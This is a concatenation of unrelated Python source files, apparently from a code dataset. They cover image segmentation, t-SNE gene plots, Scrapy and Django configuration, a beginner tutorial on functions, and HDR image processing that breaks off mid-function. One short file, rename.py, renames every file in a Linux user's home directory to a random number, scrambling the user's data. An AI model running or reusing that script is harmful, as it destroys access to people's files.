self.layer1_rn(layer_1)\n layer_2_rn = self.layer2_rn(layer_2)\n layer_3_rn = self.layer3_rn(layer_3)\n layer_4_rn = self.layer4_rn(layer_4)\n\n path_4 = self.refinenet4(layer_4_rn)\n path_3 = self.refinenet3(path_4, layer_3_rn)\n path_2 = self.refinenet2(path_3, layer_2_rn)\n path_1 = self.refinenet1(path_2, layer_1_rn)\n out = self.output_conv(path_1)\n return out\n\n def named_parameters(self):\n \"\"\"Returns parameters that requires a gradident to update.\"\"\"\n return (p for p in super().named_parameters() if p[1].requires_grad)\n\n\nclass RefineNet4CascadePoolingImproved(BaseRefineNet4Cascade):\n\n def __init__(self, input_shape,\n num_classes=1,\n features=256,\n resnet_factory=models.resnet101,\n pretrained=True,\n freeze_resnet=True):\n \"\"\"Multi-path 4-Cascaded RefineNet for image segmentation with improved pooling\n\n Args:\n input_shape ((int, int)): (channel, size) assumes input has\n equal height and width\n refinenet_block (block): RefineNet Block\n num_classes (int, optional): number of classes\n features (int, optional): number of features in refinenet\n resnet_factory (func, optional): A Resnet model from torchvision.\n Default: models.resnet101\n pretrained (bool, optional): Use pretrained version of resnet\n Default: True\n freeze_resnet (bool, optional): Freeze resnet model\n Default: True\n\n Raises:\n ValueError: size of input_shape not divisible by 32\n \"\"\"\n super().__init__(input_shape, RefineNetBlockImprovedPooling,\n num_classes=num_classes, features=features,\n resnet_factory=resnet_factory, pretrained=pretrained,\n freeze_resnet=freeze_resnet)\n\n\nclass RefineNet4Cascade(BaseRefineNet4Cascade):\n\n def __init__(self, input_shape,\n num_classes=1,\n features=256,\n resnet_factory=models.resnet101,\n pretrained=True,\n freeze_resnet=False):\n \"\"\"Multi-path 4-Cascaded RefineNet for image segmentation\n\n Args:\n input_shape ((int, int)): (channel, size) assumes input has\n equal height and width\n refinenet_block (block): RefineNet Block\n num_classes (int, optional): number of classes\n features (int, optional): number of 
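# Hedged usage sketch for RefineNet4Cascade above (assumes the package is
# importable; pretrained=False avoids downloading ResNet weights):
import torch

net = RefineNet4Cascade((3, 224), num_classes=21, pretrained=False)
out = net(torch.randn(1, 3, 224, 224))
print(out.shape)  # torch.Size([1, 21, 56, 56]) -- 1/4 of the input size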
features in refinenet\n resnet_factory (func, optional): A Resnet model from torchvision.\n Default: models.resnet101\n pretrained (bool, optional): Use pretrained version of resnet\n Default: True\n freeze_resnet (bool, optional): Freeze resnet model\n Default: True\n\n Raises:\n ValueError: size of input_shape not divisible by 32\n \"\"\"\n super().__init__(input_shape, RefineNetBlock,\n num_classes=num_classes, features=features,\n resnet_factory=resnet_factory, pretrained=pretrained,\n freeze_resnet=freeze_resnet)\n","sub_path":"KAGGLE_TGS_PYTORCH/pytorch_refinenet/pytorch_refinenet/refinenet/refinenet_4cascade.py","file_name":"refinenet_4cascade.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"381362572","text":"'''\n\tThis file allows users to visualize sets of genes with tsne\n'''\n\nimport numpy as np\nimport os\nimport subprocess\nimport json\nimport shutil\nimport itertools\nimport sys, argparse\nimport time\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom halo import Halo\nsys.path.append(os.path.dirname(os.getcwd()))\n\nfrom GTEx import GTEx\nfrom subset_gene_test import create_raw_combos, create_random_subset, load_data, convert_sets_to_vecs\n\nif __name__ == '__main__':\n\n\t# parse arguments\n\tparser = argparse.ArgumentParser(description='Run tests on specified subsets of a hallmark or random set')\n\tparser.add_argument('--set', help='subset to be used', type=str, required=True, choices=['hedgehog', 'notch', 'random'])\n\tparser.add_argument('--num_genes', help='number of genes', type=int, required=True)\n\tparser.add_argument('--set_size', help='size of subsets to visualize', type=int, required=True, choices=[1,2,3])\n\tparser.add_argument('--save', help='save .npy TSNE matrix', action='store_true')\n\tparser.add_argument('--load', help='load .npy TSNE matrix', action='store_true')\n\tparser.add_argument('--pca', help='run PCA on data before TSNE', action='store_true')\n\targs = parser.parse_args()\n\n\t# start halo spinner\n\tspinner = Halo(text='Loading', spinner='dots')\n\n\t# load the GTEx float data and the list of total genes in GTEx\n\tprint('loading genetic data...')\n\tspinner.start()\n\tgtex_gct_flt = np.load('../datasets/gtex_gct_data_float.npy')\n\ttotal_gene_list = np.load('../datasets/gtex_complete_gene_list_str.npy')\n\tspinner.stop()\n\n\t# load a data dictionary with keys as classes, values as partioned GEMs\n\tdata = load_data(\"../data_scripts/numsamples.json\", gtex_gct_flt)\n\n\t# load gene subset based on paramaters given\n\tif args.set == 'hedgehog':\n\t\tsub = np.load('../datasets/hallmark_numpys/HALLMARK_HEDGEHOG_SIGNALING.npy')\n\t\tgenes = sub[:,1].tolist()\n\telif args.set == 'notch':\n\t\tsub = np.load('../datasets/hallmark_numpys/HALLMARK_NOTCH_SIGNALING.npy')\n\t\tgenes = sub[:,1].tolist()\n\telse:\n\t\tgenes = create_random_subset(args.num_genes, total_gene_list)\n\n\n\t# create dictionary of combinations of genes\n\tgene_dict = create_raw_combos(genes, args.set_size)\n\n\t######## THIS IS HARDCODED FOR NOW... 
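# Minimal standalone sketch of the PCA -> t-SNE reduction this script runs
# (random vectors stand in for the per-combination expression vectors):
import numpy as np
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE

x = np.random.rand(200, 50)
x_reduced = PCA(n_components=20).fit_transform(x)
embedded = TSNE(n_components=2).fit_transform(x_reduced)
print(embedded.shape)  # (200, 2)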
MUST CHANGE IN FUTURE ################\n\tprev_accs = np.loadtxt('../logs/hedgehog/hh_3_gene_accuracy.txt', delimiter='\\t', dtype=np.str)\n\taccs = prev_accs[:,1]\n\taccs = accs.astype(np.float32)\n\n\t# convert dictionary to list\n\tcombo_list = []\n\tfor k in gene_dict:\n\t\tcombo_list.append(list(k))\n\n\n\tif args.load:\n\t\tprint('\\nLoading .npy TSNE file...')\n\t\tX_embedded = np.load('../datasets/TSNE/' + str(args.set) + '_' + str(args.set_size) + '.npy')\n\telse:\n\t\tprint('creating TSNE calculation matrix...')\n\t\tspinner.start()\n\n\t\tx_data = convert_sets_to_vecs(data, total_gene_list, combo_list, args.set_size)\n\n\t\tspinner.stop()\n\n\t\t#run PCA\n\t\tif args.pca:\n\t\t\tprint('running PCA...')\n\t\t\tspinner.start()\n\n\t\t\tpca = PCA()\n\t\t\tpca.fit(x_data)\n\t\t\tx_data = pca.transform(x_data)\n\n\t\t\tspinner.stop()\n\n\t\t# run TSNE\n\t\tspinner.start()\n\n\t\tprint('running TSNE...')\n\t\tX_embedded = TSNE().fit_transform(x_data)\n\n\t\tspinner.stop()\n\n\n\tif args.save:\n\t\tprint('Saving .npy TSNE file...')\n\t\tif args.pca:\n\t\t\tnp.save('../datasets/TSNE/pca_' + str(args.set) + '_' + str(args.set_size) + '.npy', X_embedded)\n\t\telse:\n\t\t\tnp.save('../datasets/TSNE/' + str(args.set) + '_' + str(args.set_size) + '_30_70.npy', X_embedded)\n\n\n\t# viz with seaborne\n\t#sns.regplot(x=X_embedded[:,0], y=X_embedded[:,1], fit_reg=False, scatter_kws={'s':1})\n\n\t# UNCOMMENT FOR HUE VISUALIZATION OF CLASSIFICATIONS\n\tplt.scatter(X_embedded[:,0], X_embedded[:,1], c=accs, s=0.5, cmap=plt.cm.coolwarm)\n\tcbar = plt.colorbar()\n\n\t# apply labels to points with > 50% accuracy\n\n\tfor label, x, y in zip(accs, X_embedded[:, 0], X_embedded[:, 1]):\n\t\tif float(label) > 0.52:\n\t\t plt.annotate(\n\t\t label,\n\t\t xy=(x, y), xytext=(-10, 10), size=6,\n\t\t textcoords='offset points', ha='right', va='bottom',\n\t\t bbox=dict(boxstyle='round,pad=0.1', fc='yellow', alpha=0.5),\n\t\t arrowprops=dict(arrowstyle = '->', connectionstyle='arc3,rad=0'))\n\n\t# show plot\n\tplt.show()\n","sub_path":"scripts/viz/tsne_viz.py","file_name":"tsne_viz.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"154646706","text":"# Scrapy settings for health project\n#\n# For simplicity, this file contains only the most important settings by\n# default. 
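# Standalone sketch of the thresholded-labelling pattern used in the t-SNE
# plot above: only points whose score clears a cutoff get an annotation.
import matplotlib.pyplot as plt
import numpy as np

xy = np.random.rand(50, 2)
scores = np.random.rand(50)
plt.scatter(xy[:, 0], xy[:, 1], c=scores, s=5, cmap=plt.cm.coolwarm)
plt.colorbar()
for s, (x, y) in zip(scores, xy):
    if s > 0.9:
        plt.annotate('%.2f' % s, xy=(x, y), size=6)
plt.savefig('annotated_scatter.png')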
All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'health'\n\nSPIDER_MODULES = ['health.spiders']\nNEWSPIDER_MODULE = 'health.spiders'\n\nITEM_PIPELINES = [\n # 'health.pipeline.PricePipeline',\n # 'health.pipeline.HealthPipeline':100\n 'health.pipelines.HealthPipeline',\n # 'health.pipelines.HealthPipeline',\n #'health.pipelines.MySQLStorePipeline'\n]\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'health (+http://www.yourdomain.com)'\n","sub_path":"health/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"76727467","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nfrom cms.sitemaps import CMSSitemap\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom bookstore import views as bookstore_views\n\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^sitemap\\.xml$', 'django.contrib.sitemaps.views.sitemap',\n {'sitemaps': {'cmspages': CMSSitemap}}),\n url(r'^select2/', include('django_select2.urls')),\n]\n\nurlpatterns += i18n_patterns('',\n url(r'^bookstore/', bookstore_views.index, name='bookstore'),\n url(r'^newbook$', bookstore_views.book_add, name='book_add'),\n url(r'^editbook/(?P\\d+)$', bookstore_views.book_edit, name='book_edit'),\n url(r'^deletebook/(?P\\d+)$', bookstore_views.book_delete, name='book_delete'),\n url(r'^book/(?P\\d+)/', bookstore_views.book_detail, name='book_detail'),\n url(r'^admin/', include(admin.site.urls)), # NOQA\n url(r'^', include('cms.urls')),\n)\n\n# This is only needed when using runserver.\nif settings.DEBUG:\n urlpatterns = [\n url(r'^media/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),\n ] + staticfiles_urlpatterns() + urlpatterns\n","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"494513134","text":"#Programa em python que renomeia arquivos(sem privilégio root) de um usuário linux\n\nimport os\nimport random\n\nlistdir = os.listdir(\"/home\")\nif (len(listdir) == 1):\n path = \"/home/\" + listdir[0]\nelse:\n path = \"/tmp\"\n\n\n\nfor filename in os.listdir(path):\n os.rename(path + \"/\" + filename, path + \"/\" + str(random.randint(111, 111111)))\n\n\n","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"42974052","text":"########################Writing your own Function###########################\r\n\r\n#####Function without a parameter#####\r\n# Define the function shout\r\ndef shout():\r\n \"\"\"Print a string with three exclamation marks\"\"\"\r\n # Concatenate the strings: shout_word\r\n shout_word = 'congratulations' + '!!!'\r\n\r\n # Print shout_word\r\n print(shout_word)\r\n\r\n# Call shout\r\nshout()\r\n\r\n\r\n#####Function with 1 parameter#####\r\n# Define shout with the parameter, word\r\ndef shout(word):\r\n \"\"\"Return a string with three exclamation marks\"\"\"\r\n # Concatenate the strings: shout_word\r\n 
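# Note on the Scrapy settings above (version behaviour is an assumption worth
# checking against your Scrapy release): modern Scrapy expects ITEM_PIPELINES
# as a dict mapping the pipeline path to an order value, not a list, e.g.
ITEM_PIPELINES = {
    'health.pipelines.HealthPipeline': 100,
}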
shout_word = word + '!!!'\r\n\r\n # Replace print with return\r\n return(shout_word)\r\n\r\n# Pass 'congratulations' to shout: yell\r\nyell = shout('congratulations')\r\n\r\n# Print yell\r\nprint(yell)\r\n\r\n\r\n#####Function with multiple parameters#####\r\n# Define shout with parameters word1 and word2\r\ndef shout(word1, word2):\r\n \"\"\"Concatenate strings with three exclamation marks\"\"\"\r\n # Concatenate word1 with '!!!': shout1\r\n shout1 = word1 + '!!!'\r\n \r\n # Concatenate word2 with '!!!': shout2\r\n shout2 = word2 + '!!!'\r\n \r\n # Concatenate shout1 with shout2: new_shout\r\n new_shout = shout1 + shout2\r\n\r\n # Return new_shout\r\n return new_shout\r\n\r\n# Pass 'congratulations' and 'you' to shout(): yell\r\nyell = shout('congratulations', 'you')\r\n\r\n# Print yell\r\nprint(yell)\r\n\r\n\r\n#####Nested Functions#####\r\n# Define echo\r\ndef echo(n):\r\n \"\"\"Return the inner_echo function.\"\"\"\r\n\r\n # Define inner_echo\r\n def inner_echo(word1):\r\n \"\"\"Concatenate n copies of word1.\"\"\"\r\n echo_word = word1 * n\r\n return echo_word\r\n\r\n # Return inner_echo\r\n return inner_echo\r\n\r\n# Call echo: twice\r\ntwice = echo(2)\r\n\r\n# Call echo: thrice\r\nthrice = echo(3)\r\n\r\n# Call twice() and thrice() then print\r\nprint(twice('hello'), thrice('hello'))\r\n\r\n\r\n#####Functions with 1 default arguement#####\r\n# Define shout_echo\r\ndef shout_echo(word1, echo=1):\r\n \"\"\"Concatenate echo copies of word1 and three\r\n exclamation marks at the end of the string.\"\"\"\r\n\r\n # Concatenate echo copies of word1 using *: echo_word\r\n echo_word = word1*echo\r\n\r\n # Concatenate '!!!' to echo_word: shout_word\r\n shout_word = echo_word + '!!!'\r\n\r\n # Return shout_word\r\n return shout_word\r\n\r\n# Call shout_echo() with \"Hey\": no_echo\r\nno_echo = shout_echo(\"Hey\")\r\n\r\n# Call shout_echo() with \"Hey\" and echo=5: with_echo\r\nwith_echo = shout_echo(\"Hey\", echo=5)\r\n\r\n# Print no_echo and with_echo\r\nprint(no_echo)\r\nprint(with_echo)\r\n\r\n\r\n#####Functions with multiple default arguments#####\r\n# Define shout_echo\r\ndef shout_echo(word1, echo=1, intense=False):\r\n \"\"\"Concatenate echo copies of word1 and three\r\n exclamation marks at the end of the string.\"\"\"\r\n\r\n # Concatenate echo copies of word1 using *: echo_word\r\n echo_word = word1 * echo\r\n\r\n # Capitalize echo_word if intense is True\r\n if intense is True:\r\n # Capitalize and concatenate '!!!': echo_word_new\r\n echo_word_new = echo_word.upper() + '!!!'\r\n else:\r\n # Concatenate '!!!' 
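# Follow-on check (illustrative): each closure returned by echo() keeps its
# own n, so new repeaters can be minted freely.
quad = echo(4)
print(quad('na'))  # nananana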
to echo_word: echo_word_new\r\n echo_word_new = echo_word + '!!!'\r\n\r\n # Return echo_word\r\n return echo_word_new\r\n\r\n# Call shout_echo() with \"Hey\", echo=5 and intense=True: with_big_echo\r\nwith_big_echo = shout_echo(\"Hey\", echo=5, intense=True)\r\n\r\n# Call shout_echo() with \"Hey\" and intense=True: big_no_echo\r\nbig_no_echo = shout_echo(\"Hey\", intense=True)\r\n\r\n# Print values\r\nprint(with_big_echo)\r\nprint(big_no_echo)\r\n\r\n\r\n#####Functions with *args#####\r\n#flexible arguments enable you to pass a variable number of arguments to a function\r\n# Define gibberish\r\ndef gibberish(*args):\r\n \"\"\"Concatenate strings in *args together.\"\"\"\r\n\r\n # Initialize an empty string: hodgepodge\r\n hodgepodge = \"\"\r\n\r\n # Concatenate the strings in args\r\n for word in args:\r\n hodgepodge += word\r\n\r\n # Return hodgepodge\r\n return hodgepodge\r\n\r\n# Call gibberish() with one string: one_word\r\none_word = gibberish(\"luke\")\r\n\r\n# Call gibberish() with five strings: many_words\r\nmany_words = gibberish(\"luke\", \"leia\", \"han\", \"obi\", \"darth\")\r\n\r\n# Print one_word and many_words\r\nprint(one_word)\r\nprint(many_words)\r\n\r\n\r\n","sub_path":"Python Data Science Toolbox 1_Functions.py","file_name":"Python Data Science Toolbox 1_Functions.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"629511837","text":"from joblib import Parallel, delayed\nimport multiprocessing as mp\nimport numpy as np\nimport random\nimport cv2\nimport os\nfrom tkinter import *\nimport time\nimport matplotlib\nfrom skimage.restoration import (denoise_tv_chambolle, denoise_bilateral, denoise_wavelet, estimate_sigma)\nfrom skimage import data, img_as_float\nfrom skimage.util import random_noise\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom itertools import islice\n\ndef chunkIt(seq, num):\n avg = len(seq) / float(num)\n out = []\n last = 0.0\n while last < len(seq):\n out.append(seq[int(last):int(last + avg)])\n last += avg\n return out\n\ndef printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end = '\\r')\n # Print New Line on Complete\n if iteration == total: \n print()\n\n\ndef rgb2gray(rgb):\n return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])\n\n\ndef linearWeight(pixel_value):\n \"\"\" Linear weighting function based on pixel intensity that reduces the\n weight of pixel values that are near saturation.\n\n Parameters\n ----------\n pixel_value : np.uint8\n A pixel intensity value from 0 to 255\n\n Returns\n -------\n weight : np.float64\n The weight corresponding to the input pixel intensity\n\n \"\"\"\n z_min, z_max = 0.,255.\n if pixel_value <= (z_min + z_max) / 2:\n w = pixel_value - z_min\n 
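# The weighting defined here is a hat function peaking at the midpoint; a
# quick standalone check (duplicating the formula for illustration):
for z in (0, 64, 128, 192, 255):
    w = z - 0. if z <= 127.5 else 255. - z
    print(z, w)  # 0, 64, 127, 63, 0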
else:\n w = z_max - pixel_value\n\n return w\n # return pixel_value - z_min\n # return z_max - pixel_value\n\n\ndef sampleIntensities(images):\n \"\"\"Randomly sample pixel intensities from the exposure stack.\n\n Parameters\n ----------\n images : list\n A list containing a stack of single-channel (i.e., grayscale)\n layers of an HDR exposure stack\n\n Returns\n -------\n intensity_values : numpy.array, dtype=np.uint8\n An array containing a uniformly sampled intensity value from each\n exposure layer (shape = num_intensities x num_images)\n\n \"\"\"\n z_min, z_max = 0, 255\n num_intensities = z_max - z_min + 1 #values of g(z)\n num_images = len(images)\n intensity_values = np.zeros((num_intensities, num_images), dtype=np.uint8) #matriz de funcion de respuesta\n\n # Find the middle image to use as the source for pixel intensity locations\n mid_img = images[num_images // 2]\n\n for i in range(z_min, z_max + 1):\n rows, cols = np.where(mid_img == i)\n if len(rows) != 0:\n idx = random.randrange(len(rows))\n for j in range(num_images):\n intensity_values[i, j] = images[j][rows[idx], cols[idx]]\n return intensity_values\n\n\ndef computeResponseCurve(intensity_samples, log_exposures, smoothing_lambda, weighting_function):\n \"\"\"Find the camera response curve for a single color channel\n\n Parameters\n ----------\n intensity_samples : numpy.ndarray #Este es lo calculado en funcion Sample Intensities como intensity_values\n Stack of single channel input values (num_samples x num_images)\n\n log_exposures : numpy.ndarray\n Log exposure times (size == num_images)\n\n smoothing_lambda : float\n A constant value used to correct for scale differences between\n data and smoothing terms in the constraint matrix -- source\n paper suggests a value of 100.\n\n weighting_function : callable\n Function that computes a weight from a pixel intensity\n\n Returns\n -------\n numpy.ndarray, dtype=np.float64\n Return a vector g(z) where the element at index i is the log exposure\n of a pixel with intensity value z = i (e.g., g[0] is the log exposure\n of z=0, g[1] is the log exposure of z=1, etc.)\n \"\"\"\n z_min, z_max = 0, 255\n intensity_range = 255 # difference between min and max possible pixel value for uint8\n num_samples = intensity_samples.shape[0]\n num_images = len(log_exposures)\n\n # NxP + [(Zmax-1) - (Zmin + 1)] + 1 constraints; N + 256 columns\n mat_A = np.zeros((num_images * num_samples + intensity_range, num_samples + intensity_range + 1), dtype=np.float64)\n mat_b = np.zeros((mat_A.shape[0], 1), dtype=np.float64)\n\n # 1. Add data-fitting constraints:\n print('Computing response curve step1')\n k = 0\n for i in range(num_samples):\n for j in range(num_images):\n z_ij = intensity_samples[i, j]\n w_ij = weighting_function(z_ij)\n mat_A[k, z_ij] = w_ij\n mat_A[k, (intensity_range + 1) + i] = -w_ij\n mat_b[k, 0] = w_ij * log_exposures[j]\n k += 1\n print('Computing response curve step2')\n # 2. Add smoothing constraints:\n for z_k in range(z_min + 1, z_max):\n w_k = weighting_function(z_k)\n mat_A[k, z_k - 1] = w_k * smoothing_lambda\n mat_A[k, z_k ] = -2 * w_k * smoothing_lambda\n mat_A[k, z_k + 1] = w_k * smoothing_lambda\n k += 1\n\n # 3. 
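# Shape sanity check (illustrative) for the constraint matrix built above:
# N*P data-fitting rows + 254 smoothness rows + 1 centering row, and
# N + 256 columns.
num_samples, num_images = 256, 5
print(num_samples * num_images + 255, num_samples + 256)  # 1535 512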
Add color curve centering constraint:\n mat_A[k, (z_max - z_min) // 2] = 1\n print('Solving matrix response curve')\n inv_A = np.linalg.pinv(mat_A)\n x = np.dot(inv_A, mat_b)\n\n g = x[0: intensity_range + 1]\n return g[:, 0]\n\n\ndef computeRadianceMap(images, log_exposure_times, response_curve, weighting_function):\n \"\"\"Calculate a radiance map for each pixel from the response curve.\n\n Parameters\n ----------\n images : list\n Collection containing a single color layer (i.e., grayscale)\n from each image in the exposure stack. (size == num_images)\n\n log_exposure_times : numpy.ndarray\n Array containing the log exposure times for each image in the\n exposure stack (size == num_images)\n\n response_curve : numpy.ndarray\n Least-squares fitted log exposure of each pixel value z\n\n weighting_function : callable\n Function that computes the weights\n\n Returns\n -------\n numpy.ndarray(dtype=np.float64)\n The image radiance map (in log space)\n \"\"\"\n img_shape = images[0].shape\n img_rad_map = np.zeros(img_shape, dtype=np.float64)\n num_images = len(images)\n print('Computing radiance map')\n # printProgressBar(0, img_shape[0], prefix = 'Progress:', suffix = 'Complete', length = 50)\n \n for i in range(img_shape[0]):\n for j in range(img_shape[1]):\n g = np.array([response_curve[images[k][i, j]] for k in range(num_images)])\n w = np.array([weighting_function(images[k][i, j]) for k in range(num_images)])\n SumW = np.sum(w)\n if SumW > 0:\n img_rad_map[i, j] = np.sum(w * (g - log_exposure_times) / SumW)\n else:\n img_rad_map[i, j] = g[num_images // 2] - log_exposure_times[num_images // 2]\n # printProgressBar(i + 1, img_shape[0], prefix = 'Progress:', suffix = 'Complete', length = 50)\n return np.array(img_rad_map,dtype=np.complex)\n\n\ndef r_c_parallel(i,images, log_exposure_times, response_curve, weighting_function):\n \"\"\"Calculate a radiance map for each pixel from the response curve.\n\n Parameters\n ----------\n images : list\n Collection containing a single color layer (i.e., grayscale)\n from each image in the exposure stack. 
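# The per-pixel recurrence behind the radiance map above (illustrative
# numbers), after Debevec & Malik: the weighted average of g(Z_ij) - ln(dt_j).
import numpy as np

g = np.array([1.0, 1.2, 1.5])        # response curve at this pixel's values
log_dt = np.log([1 / 60, 1 / 30, 1 / 15])
w = np.array([0.5, 1.0, 0.5])
print(np.sum(w * (g - log_dt)) / np.sum(w))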
(size == num_images)\n\n log_exposure_times : numpy.ndarray\n Array containing the log exposure times for each image in the\n exposure stack (size == num_images)\n\n response_curve : numpy.ndarray\n Least-squares fitted log exposure of each pixel value z\n\n weighting_function : callable\n Function that computes the weights\n\n Returns\n -------\n numpy.ndarray(dtype=np.float64)\n The image radiance map (in log space)\n \"\"\"\n img_shape = images[0].shape\n img_rad_map = np.zeros(img_shape, dtype=np.float64)\n num_images = len(images)\n print('Making row %i'%i)\n # printProgressBar(0, img_shape[0], prefix = 'Progress:', suffix = 'Complete', length = 50)\n \n # for i in range(img_shape[0]):\n for j in range(img_shape[1]):\n g = np.mean(np.array([response_curve[images[k][i, j]] for k in range(num_images)]),axis=0)\n w = np.mean(np.array([weighting_function(images[k][i, j]) for k in range(num_images)]),axis=0)\n SumW = np.sum(w)\n if SumW > 0:\n img_rad_map[i, j] = np.sum(w * (g - log_exposure_times) / SumW)\n # return img_rad_map\n else:\n img_rad_map[i, j] = g[num_images // 2] - log_exposure_times[num_images // 2]\n # return img_rad_map\n # printProgressBar(i + 1, img_shape[0], prefix = 'Progress:', suffix = 'Complete', length = 50)\n return np.array(img_rad_map,dtype=np.complex)\n\n\n\ndef globalToneMapping(image, gamma):\n \"\"\"Global tone mapping using gamma correction\n ----------\n images : \n Image needed to be corrected\n gamma : floating number\n The number for gamma correction. Higher value for brighter result; lower for darker\n Returns\n -------\n numpy.ndarray\n The resulting image after gamma correction\n \"\"\"\n # image_corrected = cv2.pow(image/255., 1.0/gamma)\n image_corrected = np.abs(np.power(image/255., 1.0/gamma))\n return image_corrected\n\n\ndef intensityAdjustment(image, template):\n \"\"\"Tune image intensity based on template\n ----------\n images : \n image needed to be adjusted\n template : \n Typically we use the middle image from image stack. 
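# Quick check (illustrative) of the global tone mapping above: a gamma above
# 1 lifts the mid-tones of the normalized image.
import numpy as np

img = np.linspace(0, 255, 6)
print(np.power(img / 255., 1.0 / 1.6))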
We want to match the image\n        intensity for each channel to template's\n    Returns\n    -------\n    numpy.ndarray\n        The resulting image after intensity adjustment\n    \"\"\"\n    m, n = image.shape[:2]\n    channel = 1\n    # the stack is grayscale here: promote both arrays to (m, n, 1) so the\n    # per-channel loop below also works for 2-D inputs\n    image = image.reshape(m, n, channel)\n    template = template.reshape(m, n, channel)\n    output = np.zeros((m, n, channel))\n    for ch in range(channel):\n        image_avg, template_avg = np.average(image[:, :, ch]), np.average(template[:, :, ch])\n        output[..., ch] = image[..., ch] * (template_avg / image_avg)\n\n    return output\n\n\ndef computeHDR(images, log_exposure_times, smoothing_lambda=100., gamma=1.6):\n    \"\"\"Computational pipeline to produce the HDR images\n\n    Parameters\n    ----------\n    images : list\n        A list containing an exposure stack of images\n    log_exposure_times : numpy.ndarray\n        The log exposure times for each image in the exposure stack\n    smoothing_lambda : np.int (Optional)\n        A constant value to correct for scale differences between\n        data and smoothing terms in the constraint matrix -- source\n        paper suggests a value of 100.\n    gamma : float (Optional)\n        Gamma value passed to the global tone-mapping step.\n    Returns\n    -------\n    numpy.ndarray\n        The resulting HDR with intensities scaled to fit uint8 range\n    \"\"\"\n\n    num_channels = 1\n    hdr_image = np.zeros(images[0].shape, dtype=np.float64)\n\n    layer_stack = [img[:, :] for img in images]\n    intensity_samples = sampleIntensities(layer_stack)\n    response_curve = computeResponseCurve(intensity_samples, log_exposure_times, smoothing_lambda, linearWeight)\n\n    # img_shape = layer_stack[0].shape\n    # img_rad_map = np.zeros(img_shape, dtype=np.float64)\n    # inputs = range(img_shape[0])\n    \n\n    # num_cores = multiprocessing.cpu_count()\n\n    # img_rad_map_par = Parallel(n_jobs=num_cores)(delayed(r_c_parallel)(i,layer_stack, log_exposure_times, response_curve, linearWeight) for i in inputs)\n    # print(img_rad_map_par)\n    # img_rad_map_par = r_c_parallel(inputs,layer_stack, log_exposure_times, response_curve, linearWeight)\n\n\n    img_rad_map = computeRadianceMap(layer_stack, log_exposure_times, response_curve, linearWeight)\n    img_rad_map = img_rad_map*(255./np.max(img_rad_map))\n    image_mapped = globalToneMapping(img_rad_map, gamma)\n    return image_mapped\n\n    # for channel in range(num_channels):\n    #     # Collect the current layer of each input image from the exposure stack\n    #     layer_stack = [img[:, :, channel] for img in images]\n\n    #     # Sample image intensities\n    #     intensity_samples = sampleIntensities(layer_stack)\n\n    #     # Compute Response Curve\n    #     response_curve = computeResponseCurve(intensity_samples, log_exposure_times, smoothing_lambda, linearWeight)\n\n    #     # Build radiance map\n    #     img_rad_map = computeRadianceMap(layer_stack, log_exposure_times, response_curve, linearWeight)\n\n    #     # Normalize hdr layer to (0, 255)\n    #     hdr_image[..., channel] = cv2.normalize(img_rad_map, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)\n\n    # # Global tone mapping\n    # image_mapped = globalToneMapping(hdr_image, gamma)\n\n    # # Adjust image intensity based on the middle image from image stack\n    # template = images[len(images)//2]\n    # image_tuned = intensityAdjustment(image_mapped, template)\n\n    # # Output image\n    # # output = cv2.normalize(image_tuned, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)\n    # # output = cv2.normalize(image_mapped, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)\n    # return output.astype(np.uint8)\n\ndef window(seq, n=2):\n    \"Returns a sliding window (of width n) over data from the iterable\"\n    \" s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... 
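-> the first window is filled with itertools.islice, then each later window drops its oldest element and appends the next one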
